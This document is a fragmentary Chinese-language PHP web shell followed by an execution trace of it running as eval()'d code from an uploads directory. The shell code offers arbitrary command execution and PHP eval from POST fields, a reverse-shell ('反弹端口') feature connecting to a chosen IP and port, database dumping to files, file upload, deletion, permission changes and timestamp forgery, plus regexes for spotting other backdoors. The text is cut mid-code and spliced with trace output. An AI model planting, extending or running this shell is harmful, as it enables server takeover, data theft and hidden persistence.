\'文件管理\',\'scan\' => \'搜索文件\',\'antivirus\' => \'扫描后门\',\'backshell\' => \'反弹端口\',\'exec\' => \'执行命令\',\'phpeval\' => \'执行PHP\',\'sql\' => \'执行SQL\',\'info\' => \'系统信息\');$go = array_key_exists($_POST[\'go\'],$menu) ? $_POST[\'go\'] : \'file\';$nowdir = isset($_POST[\'dir\']) ? strdir(chop($_POST[\'dir\']).\'/\') : THISDIR;echo \'.*?(Command|Configuration)+.*?\\<\\/td\\>\\ (.*?)\\<\\/td\\>/i\',$out,$tmp);$config = $tmp[2][0];$phpini = $tmp[2][2] ? $tmp[2][1].\' --- \'.$tmp[2][2] : $tmp[2][1];}$infos = array(\'客户端浏览器信息\' => $_SERVER[\'HTTP_USER_AGENT\'],\'被禁用的函数\' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : \'(无)\',\'被禁用的类\' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : \'(无)\',\'PHP.ini配置路径\' => $phpini ? $phpini : \'(无)\',\'PHP运行方式\' => php_sapi_name(),\'PHP版本\' => PHP_VERSION,\'PHP进程PID\' => getmypid(),\'客户端IP\' => $_SERVER[\'REMOTE_ADDR\'],\'客户端文字编码\' => $_SERVER[\'HTTP_ACCEPT_LANGUAGE\'],\'Web服务端口\' => $_SERVER[\'SERVER_PORT\'],\'Web根目录\' => $_SERVER[\'DOCUMENT_ROOT\'],\'Web执行脚本\' => $_SERVER[\'SCRIPT_FILENAME\'],\'Web规范CGI版本\' => $_SERVER[\'GATEWAY_INTERFACE\'],\'Web管理员Email\' => $_SERVER[\'SERVER_ADMIN\'] ? $_SERVER[\'SERVER_ADMIN\'] : \'(无)\',\'当前磁盘总大小\' => size(disk_total_space(\'.\')),\'当前磁盘可用空间\' => size(disk_free_space(\'.\')),\'POST最大字数量\' => get_cfg_var("post_max_size"),\'允许最大上传文件\' => get_cfg_var("upload_max_filesize"),\'程序最大使用内存量\' => get_cfg_var("memory_limit"),\'程序最长运行时间\' => get_cfg_var("max_execution_time").\'秒\',\'是否支持Fsockopen\' => function_exists(\'fsockopen\') ? \'是\' : \'否\',\'是否支持Socket\' => function_exists(\'socket_close\') ? \'是\' : \'否\',\'是否支持Pcntl\' => function_exists(\'pcntl_exec\') ? \'是\' : \'否\',\'是否支持Curl\' => function_exists(\'curl_version\') ? \'是\' : \'否\',\'是否支持Zlib\' => function_exists(\'gzclose\') ? \'是\' : \'否\',\'是否支持FTP\' => function_exists(\'ftp_login\') ? \'是\' : \'否\',\'是否支持XML\' => function_exists(\'xml_set_object\') ? \'是\' : \'否\',\'是否支持GD_Library\' => function_exists(\'imageline\') ? \'是\' : \'否\',\'是否支持COM组建\' => class_exists(\'COM\') ? \'是\' : \'否\',\'是否支持ODBC组建\' => function_exists(\'odbc_close\') ? \'是\' : \'否\',\'是否支持IMAP邮件\' => function_exists(\'imap_close\') ? \'是\' : \'否\',\'是否运行于安全模式\' => get_cfg_var("safemode") ? \'是\' : \'否\',\'是否允许URL打开文件\' => get_cfg_var("allow_url_fopen") ? \'是\' : \'否\',\'是否允许动态加载链接库\' => get_cfg_var("enable_dl") ? \'是\' : \'否\',\'是否显示错误信息\' => get_cfg_var("display_errors") ? \'是\' : \'否\',\'是否自动注册全局变量\' => get_cfg_var("register_globals") ? \'是\' : \'否\',\'是否使用反斜线引用字符串\' => get_cfg_var("magic_quotes_gpc") ? \'是\' : \'否\',\'PHP编译参数\' => $config ? $config : \'(无)\');echo \'
\';break;case "exec" : $cmd = $win ? \'dir\' : \'ls -al\';$res = array(\'res\' => \'命令回显\',\'msg\' => $msg);$str = isset($_POST[\'str\']) ? $_POST[\'str\'] : \'fun\';if(isset($_POST[\'cmd\'])) {$cmd = $_POST[\'cmd\'];$cwd = $str == \'fun\' ? THISDIR : \'com\';$res = command($cmd,$cwd);}echo \'(.*)\\<\\/script\\>/i\',\'/Load\\s*\\((.*)Request/i\',\'/StreamWriter\\(Server\\.MapPath(.*)\\.Write\\(Request/i\'),\'jsp\' => array(\'/(eval|execute)+(.*)(request|session)+\\s*\\((.*)\\)/i\',\'/(eval|execute)+(.*)request.item\\s*\\[(.*)\\]/i\',\'/request\\s*\\((.*)\\)(.*)(eval|execute)+\\s*\\((.*)\\)/i\',\'/Runtime\\.getRuntime\\(\\)\\.exec\\((.*)\\)/i\',\'/FileOutputStream\\(application\\.getRealPath(.*)request/i\',));flush(); ob_flush();echo \'
\';foreach($menu as $key => $name) { echo \'\'.$name.\' \'; }echo \'
\';echo \'\';switch($_POST[\'go\']) {case "info" : if(EXISTS_PHPINFO) {ob_start();phpinfo(INFO_GENERAL);$out = ob_get_contents();ob_end_clean();$tmp = array();preg_match_all(\'/\\\'.$msg.\'
\';echo \'| 名称 | 参数 |
|---|---|
| \'.$name.\' | \'.$var.\' |
\'.$res[\'msg\'].\'
\';echo \'\';break;case "scan" : $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;$keyword = isset($_POST[\'keyword\']) ? $_POST[\'keyword\'] : \'\';$include = isset($_POST[\'include\']) ? chop($_POST[\'include\']) : \'.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py\';$filters = isset($_POST[\'filters\']) ? chop($_POST[\'filters\']) : \'html|css|img|images|image|style|js\';echo \'\'.$msg.\'
\';echo \'\';if($keyword != \'\') {flush(); ob_flush();echo \'\';$incs = $include == \'\' ? false : explode(\'|\',$include);$fits = $filters == \'\' ? false : explode(\'|\',$filters);$isread = scanfile(strdir($scandir.\'/\'),$keyword,$incs,$fits,$_POST[\'type\'],$_POST[\'char\'],$_POST[\'range\'],$nowdir);echo \'
\';}break;case "antivirus" : $scandir = empty($_POST[\'dir\']) ? base64_decode($_POST[\'govar\']) : $nowdir;$typearr = isset($_POST[\'dir\']) ? $_POST[\'types\'] : array(\'php\' => \'.php\');echo \'\'.($isread ? \'
搜索完成
\' : \'搜索失败
\').\'\'.$msg.\'
\';echo \'\';if(count($_POST[\'types\']) > 0) {$matches = array(\'php\' => array(\'/function\\_exists\\s*\\(\\s*[\\\'|\\"](popen|exec|proc\\_open|system|passthru)+[\\\'|\\"]\\s*\\)/i\',\'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(GET|POST|COOKIE|SERVER|SESSION)+\\[(.*)\\]\\s*\\)/i\',\'/(udp\\:\\/\\/(.*)\\;)+/i\',\'/preg\\_replace\\s*\\((.*)\\/e(.*)\\,\\s*\\$\\_(.*)\\,(.*)\\)/i\',\'/preg\\_replace\\s*\\((.*)\\(base64\\_decode\\(\\$/i\',\'/(eval|assert|include|require)+\\s*\\((.*)(base64\\_decode|file\\_get\\_contents|php\\:\\/\\/input)+/i\',\'/(eval|assert|include|require|array\\_map)+\\s*\\(\\s*\\$\\_(GET|POST|COOKIE|SERVER|SESSION)+\\[(.*)\\]\\s*\\)/i\',\'/\\$\\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\\s*\\(\\s*\\$(\\w+)\\s*\\)/i\',\'/\\$\\_(GET|POST|COOKIE|SERVER|SESSION)+\\[(.*)\\]\\(\\s*\\$(.*)\\)/i\',\'/\\(\\s*\\$\\_FILES\\[(.*)\\]\\[(.*)\\]\\s*\\,\\s*\\$\\_FILES\\[(.*)\\]\\[(.*)\\]\\s*\\)/i\',\'/(fopen|fwrite|fpust|file\\_put\\_contents)+\\s*\\((.*)\\$\\_(GET|POST|COOKIE|SERVER|SESSION)+\\[(.*)\\](.*)\\)/i\',\'/echo\\s*curl\\_exec\\s*\\(\\s*\\$(\\w+)\\s*\\)/i\',\'/new com\\s*\\(\\s*[\\\'|\\"]shell(.*)[\\\'|\\"]\\s*\\)/i\',\'/\\$(.*)\\s*\\((.*)\\/e(.*)\\,\\s*\\$\\_(.*)\\,(.*)\\)/i\',\'/\\$\\_\\=(.*)\\$\\_/i\'),\'asp+aspx\' => array(\'/(VBScript\\.Encode|WScript\\.shell|Shell\\.Application|Scripting\\.FileSystemObject)+/i\',\'/(eval|execute)+(.*)(request|session)+\\s*\\((.*)\\)/i\',\'/(eval|execute)+(.*)request.item\\s*\\[(.*)\\]/i\',\'/request\\s*\\((.*)\\)(.*)(eval|execute)+\\s*\\((.*)\\)/i\',\'/\\\';$isread = antivirus(strdir($scandir.\'/\'),$typearr,$matches,$nowdir);echo \'
\';}break;case "phpeval" : if(isset($_POST[\'phpcode\'])) {$phpcode = chop($_POST[\'phpcode\']);ob_start();if(substr($phpcode,0,2) == \'\') { @eval (\'?>\'.$phpcode.\'\'.$msg.\'\';echo \'\'.($isread ? \'
扫描完成
\' : \'扫描失败
\').\'\';break;case "sql" : if((!empty($_POST[\'sqlhost\'])) && (!empty($_POST[\'sqluser\'])) && (!empty($_POST[\'names\']))) {$type = $_POST[\'type\'];$sqlhost = $_POST[\'sqlhost\'];$sqluser = $_POST[\'sqluser\'];$sqlpass = $_POST[\'sqlpass\'];$sqlname = $_POST[\'sqlname\'];$sqlcode = $_POST[\'sqlcode\'];$names = $_POST[\'names\'];switch($type) {case "PostgreSql" : if(function_exists(\'pg_close\')){if(strstr($sqlhost,\':\')) { $array = explode(\':\',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; }else { $sqlport = 5432; }$dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass");if($dbconn) {$msg = \'
连接\'.$type.\'成功
\';pg_query(\'set client_encoding=\'.$names);$result = pg_query($sqlcode);if($result) { $msg .= \'- 执行SQL成功
\'; while($array = pg_fetch_array($result)) { $rows[] = $array; } }else { $msg .= \'- 执行SQL失败
\'; $rows = array(\'error\' => pg_result_error($result)); }pg_free_result($result);} else {$msg = \'连接\'.$type.\'失败
\';}@pg_close($dbconn);} else {$msg = \'不支持\'.$type.\'
\';}break;case "MsSql" : if(function_exists(\'mssql_close\')){$dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass);if($dbconn) {$msg = \'连接\'.$type.\'成功
\';mssql_select_db($sqlname,$dbconn);$result = mssql_query($sqlcode);if($result) { $msg .= \'- 执行SQL成功
\'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } }else { $msg .= \'- 执行SQL失败
\'; }@mssql_free_result($result);} else {$msg = \'连接\'.$type.\'失败
\';}@mssql_close($dbconn);} else {$msg = \'不支持\'.$type.\'
\';}break;case "Oracle" : if(function_exists(\'oci_close\')){$conn = @oci_connect($sqluser,$sqlpass,$sqlhost.\'/\'.$sqlname);if($conn) {$msg = \'连接\'.$type.\'成功
\';$stid = oci_parse($conn,$sqlcode);oci_execute($stid);if($stid) { $msg .= \'- 执行SQL成功
\'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } }else { $msg .= \'- 执行SQL失败
\'; $e = oci_error(); $rows = array(\'error\' => $e[\'message\']); }oci_free_statement($stid);} else {$e = oci_error(); $rows = array(\'error\' => $e[\'message\']);$msg = \'连接\'.$type.\'失败
\';}@oci_close($conn);} else {$msg = \'不支持\'.$type.\'
\';}break;case "MySql" : if(function_exists(\'mysql_close\')){$conn = mysql_connect(strstr($sqlhost,\':\') ? $sqlhost : $sqlhost.\':3306\',$sqluser,$sqlpass,$sqlname);if($conn) {$msg = \'连接\'.$type.\'成功
\';if(substr($sqlcode,0,7) == \'t00lsa\') {$array = array(); $data = \'\'; $i = 0;preg_match_all(\'/t00lsa\\s*\\\'(.*)\\\'\\s*t00lsb\\s*\\\'(.*)\\\'\\s*t00lsc\\s*\\\'(.*)\\\'\\s*t00lsfile\\s*\\\'(.*)\\\'/i\',$sqlcode,$array);if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {mysql_select_db($array[1][0],$conn);mysql_query(\'set names \'.$names,$conn);$spidercode = \'select \'.$array[3][0].\' from `\'.$array[2][0].\'`;\';$result = mysql_query($spidercode,$conn);if($result) {while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join(\' |x| \',$row)."\\r\\n"; $i++; }if($data) {$file = strdir($array[4][0]);$msg .= filew($file,$data,\'w\') ? \'- 脱库成功
\' : \'- 导出文件失败
\';$rows = array(\'file\' => $file,size(filesize($file)) => \'共获取\'.$i.\'条数据\');}else { $msg .= \'- 没有数据
\'; }}else { $msg .= \'- 执行SQL失败
\'; $rows = array(\'errno\' => mysql_errno(),\'error\' => mysql_error()); }}else { $msg .= \'- 脱库语句错误
\'; }} elseif(!empty($sqlcode)) {mysql_select_db($sqlname,$conn);mysql_query(\'set names \'.$names,$conn);$result = mysql_query($sqlcode,$conn);if($result) { $msg .= \'- 执行SQL成功
\'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }else { $msg .= \'- 执行SQL失败
\'; $rows = array(\'errno\' => mysql_errno(),\'error\' => mysql_error()); }}mysql_free_result($result);} else {$msg = \'连接\'.$type.\'失败
\';$rows = array(\'errno\' => mysql_errno(),\'error\' => mysql_error());}mysql_close($conn);} else {$msg = \'不支持\'.$type.\'
\';}break;}} else {$type = \'MySql\';$sqlhost = \'localhost:3306\';$sqluser = \'root\';$sqlpass = \'123456\';$sqlname = \'mysql\';$sqlcode = \'select version();\';$names = \'gbk\';}echo \'\'.$msg.\'
\';echo \'\';if($rows) {echo \'\';ob_start();print_r($rows);$out = ob_get_contents();ob_end_clean();if(preg_match(\'~[\\x{4e00}-\\x{9fa5}]+~u\',$out) && function_exists(\'iconv\')) { $out = @iconv(\'UTF-8\',\'GB2312//IGNORE\',$out); }echo htmlspecialchars($out);echo \'\';}break;case "backshell" : if((!empty($_POST[\'backip\'])) && (!empty($_POST[\'backport\']))) {$backip = $_POST[\'backip\'];$backport = $_POST[\'backport\'];$temp = $_POST[\'temp\'] ? $_POST[\'temp\'] : \'/tmp\';$type = $_POST[\'type\'];$msg = backshell($backip,$backport,$temp,$type);} else {$backip = $_SERVER[\'REMOTE_ADDR\'];$backport = \'443\';$temp = \'/tmp\';$type = \'pl\';}echo \'\'.$msg.\'
\';echo \'\';break;case "edit" : case "editor" : $file = strdir($_POST[\'godir\'].\'/\'.$_POST[\'govar\']);$iconv = function_exists(\'iconv\');if(!file_exists($file)) {$msg = \'【新建文件】\';} else {$code = filer($file);$chst = \'默认\';if(preg_match(\'~[\\x{4e00}-\\x{9fa5}]+~u\',$code) && $iconv) { $chst = \'utf-8\'; $code = @iconv(\'UTF-8\',\'GB2312//IGNORE\',$code); }$size = size(filesize($file));$msg = \'【文件属性 \'.substr(decoct(fileperms($file)),-4).\'】 【文件大小 \'.$size.\'】 【文件编码 \'.$chst.\'】\';}echo base64_decode(\'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==\');echo \' - \'.$msg.\'
\';echo \'\';echo \' \';echo \'
\';break;case "upfiles" : $updir = isset($_POST[\'updir\']) ? $_POST[\'updir\'] : $_POST[\'godir\'];$msg = \'【最大上传文件 \'.get_cfg_var("upload_max_filesize").\'】 【POST最大提交数据 \'.get_cfg_var("post_max_size").\'】\';$max = 10;if(isset($_FILES[\'uploads\']) && isset($_POST[\'renames\'])) {$uploads = $_FILES[\'uploads\'];$msgs = array();for($i = 1;$i < $max;$i++) {if($uploads[\'error\'][$i] == UPLOAD_ERR_OK) {$rename = $_POST[\'renames\'][$i] == \'\' ? $uploads[\'name\'][$i] : $_POST[\'renames\'][$i];$filea = $uploads[\'tmp_name\'][$i];$fileb = strdir($updir.\'/\'.$rename);$msgs[$i] = fileu($filea,$fileb) ? \'上传成功 \'.$rename.\'
\' : \'上传失败 \'.$rename.\'
\';}}}echo \'\'.$msg.\'
\';echo \' \';echo \'
\';break;default : if(isset($_FILES[\'upfile\'])) {if($_FILES[\'upfile\'][\'name\'] == \'\') { $msg = \'请选择文件
\'; }else { $rename = $_POST[\'rename\'] == \'\' ? $_FILES[\'upfile\'][\'name\'] : $_POST[\'rename\']; $filea = $_FILES[\'upfile\'][\'tmp_name\']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? \'上传文件\'.$rename.\'成功
\' : \'上传文件\'.$rename.\'失败
\'; }}if(isset($_POST[\'act\'])) {switch($_POST[\'act\']) {case "a" : if(!$_POST[\'files\']) { $msg = \'请选择文件 \'.$_POST[\'var\'].\'
\'; }else { $i = 0; foreach($_POST[\'files\'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST[\'var\'].\'/\'.$filename)) ? 1 : 0; } $msg = $msg = $i ? \'共复制 \'.$i.\' 个文件到\'.$_POST[\'var\'].\'成功
\' : \'共复制 \'.$i.\' 个文件到\'.$_POST[\'var\'].\'失败
\'; }break;case "b" : if(!$_POST[\'files\']) { $msg = \'请选择文件
\'; }else { $i = 0; foreach($_POST[\'files\'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? \'共删除 \'.$i.\' 个文件成功
\' : \'共删除 \'.$i.\' 个文件失败
\'; }break;case "c" : if(!$_POST[\'files\']) { $msg = \'请选择文件 \'.$_POST[\'var\'].\'
\'; }elseif(!ereg("^[0-7]{4}$",$_POST[\'var\'])) { $msg = \'属性值错误
\'; }else { $i = 0; foreach($_POST[\'files\'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST[\'var\'],8,10)) ? 1 : 0; } $msg = $i ? \'共 \'.$i.\' 个文件修改属性为\'.$_POST[\'var\'].\'成功
\' : \'共 \'.$i.\' 个文件修改属性为\'.$_POST[\'var\'].\'失败
\'; }break;case "d" : if(!$_POST[\'files\']) { $msg = \'请选择文件 \'.$_POST[\'var\'].\'
\'; }elseif(!preg_match(\'/(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)/\',$_POST[\'var\'])) { $msg = \'时间格式错误 \'.$_POST[\'var\'].\'
\'; }else { $i = 0; foreach($_POST[\'files\'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST[\'var\'])) ? 1 : 0; } $msg = $i ? \'共 \'.$i.\' 个文件修改时间为\'.$_POST[\'var\'].\'成功
\' : \'共 \'.$i.\' 个文件修改时间为\'.$_POST[\'var\'].\'失败
\'; }break;case "e" : $path = strdir($nowdir.$_POST[\'var\'].\'/\');if(file_exists($path)) { $msg = \'目录已存在 \'.$_POST[\'var\'].\'
\'; }else { $msg = @mkdir($path,0777) ? \'创建目录 \'.$_POST[\'var\'].\' 成功
\' : \'创建目录 \'.$_POST[\'var\'].\' 失败
\'; }break;case "f" : $context = array(\'http\' => array(\'timeout\' => 30));if(function_exists(\'stream_context_create\')) { $stream = stream_context_create($context); }$data = @file_get_contents ($_POST[\'var\'],false,$stream);$filename = array_pop(explode(\'/\',$_POST[\'var\']));if($data) { $msg = filew(strdir($nowdir.$filename),$data,\'wb\') ? \'下载 \'.$filename.\' 成功
\' : \'下载 \'.$filename.\' 失败
\'; } else { $msg = \'下载失败或不支持下载
\'; }break;case "rf" : $files = explode(\'|x|\',$_POST[\'var\']);if(count($files) != 2) { $msg = \'输入错误
\'; }else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? \'重命名 \'.$files[1].\' 为 \'.$files[0].\' 成功
\' : \'重命名 \'.$files[1].\' 为 \'.$files[0].\' 失败
\'; }break;case "pd" : $files = explode(\'|x|\',$_POST[\'var\']);if(count($files) != 2) { $msg = \'输入错误
\'; }else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? \'修改\'.$files[1].\'属性为\'.$files[0].\'成功
\' : \'修改\'.$files[1].\'属性为\'.$files[0].\'失败
\'; }break;case "edit" : if(isset($_POST[\'filename\']) && isset($_POST[\'filecode\'])) { if($_POST[\'tostr\'] == \'utf\') { $_POST[\'filecode\'] = @iconv(\'GB2312//IGNORE\',\'UTF-8\',$_POST[\'filecode\']); } $msg = filew($_POST[\'filename\'],$_POST[\'filecode\'],\'w\') ? \'保存成功 \'.$_POST[\'filename\'].\'
\' : \'保存失败 \'.$_POST[\'filename\'].\'
\'; }break;case "deltree" : $deldir = strdir($nowdir.$_POST[\'var\'].\'/\');if(!file_exists($deldir)) { $msg = \'目录 \'.$_POST[\'var\'].\' 不存在
\'; }else { $msg = deltree($deldir) ? \'删除目录 \'.$_POST[\'var\'].\' 成功
\' : \'删除目录 \'.$_POST[\'var\'].\' 失败
\'; }break;}}$chmod = substr(decoct(fileperms($nowdir)),-4);if(!$chmod) { $msg .= \' -无法读取目录
\'; }$array = showdir($nowdir);$thisurl = strdir(\'/\'.strtr($nowdir,array(ROOTDIR => \'\')).\'/\');$nowdir = strtr($nowdir,array(\'\\\'\' => \'%27\',\'"\' => \'%22\'));echo \'\'.$msg.\'
\';echo \'\';echo \' \';echo \' \';echo \' \';echo \' \';echo \'
\';echo \'\';break;}?>\'.$_SERVER[\'SERVER_SOFTWARE\'];?>
'\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/network.php'
6 19 1 0.008290 1093664
6 19 R '/var/www/html/uploads/network.php'
5 17 1 0.008306 1093568
5 17 R '/var/www/html/uploads/network.php'
4 A /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 $myfile = '/var/www/html/uploads/network.php'
5 20 0 0.008335 1093568 strpos 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 2 '/var/www/html/uploads/network.php' 'eval()'
5 20 1 0.008351 1093640
5 20 R FALSE
4 A /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 $myfile = '/var/www/html/uploads/network.php'
5 21 0 0.008377 1093568 dirname 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/var/www/html/uploads/network.php'
5 21 1 0.008392 1093664
5 21 R '/var/www/html/uploads'
5 22 0 0.008407 1093616 strdir 1 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/var/www/html/uploads/'
6 23 0 0.008421 1093616 chop 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/var/www/html/uploads/'
6 23 1 0.008435 1093648
6 23 R '/var/www/html/uploads/'
6 24 0 0.008449 1093616 str_replace 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/'
6 24 1 0.008471 1093712
6 24 R '/var/www/html/uploads/'
5 22 1 0.008485 1093616
5 22 R '/var/www/html/uploads/'
5 25 0 0.008499 1093616 define 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 2 'THISDIR' '/var/www/html/uploads/'
5 25 1 0.008516 1093720
5 25 R TRUE
5 26 0 0.008529 1093648 strdir 1 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/uploads/network.php'
6 27 0 0.008548 1093648 chop 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/uploads/network.php'
6 27 1 0.008563 1093680
6 27 R '/uploads/network.php'
6 28 0 0.008577 1093648 str_replace 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/uploads/network.php'
6 28 1 0.008599 1093744
6 28 R '/uploads/network.php'
5 26 1 0.008613 1093648
5 26 R '/uploads/network.php'
5 29 0 0.008627 1094024 strtr 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 2 '/var/www/html/uploads/network.php' ['/uploads/network.php' => '']
5 29 1 0.008645 1094128
5 29 R '/var/www/html'
5 30 0 0.008659 1093688 strdir 1 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/var/www/html/'
6 31 0 0.008673 1093688 chop 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 '/var/www/html/'
6 31 1 0.008688 1093720
6 31 R '/var/www/html/'
6 32 0 0.008701 1093688 str_replace 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/'
6 32 1 0.008722 1093784
6 32 R '/var/www/html/'
5 30 1 0.008736 1093688
5 30 R '/var/www/html/'
5 33 0 0.008749 1093688 define 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 2 'ROOTDIR' '/var/www/html/'
5 33 1 0.008766 1093792
5 33 R TRUE
5 34 0 0.008780 1093720 getinfo 1 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 0
6 35 0 0.008797 1094120 function_exists 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 'phpinfo'
6 35 1 0.008813 1094160
6 35 R TRUE
5 A /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 $infos = [0 => NULL, 1 => 'bbe922ad1952e6be3a57c66ea0ce581a', 2 => TRUE, 3 => '127.0.0.1']
6 36 0 0.008845 1094120 md5 0 /var/www/html/uploads/network.php(1) : runtime-created function(1) : eval()'d code 1 1 NULL
6 36 1 0.008862 1094216
6 36 R 'd41d8cd98f00b204e9800998ecf8427e'
0.008917 1014792
TRACE END [2023-02-13 00:52:45.322127]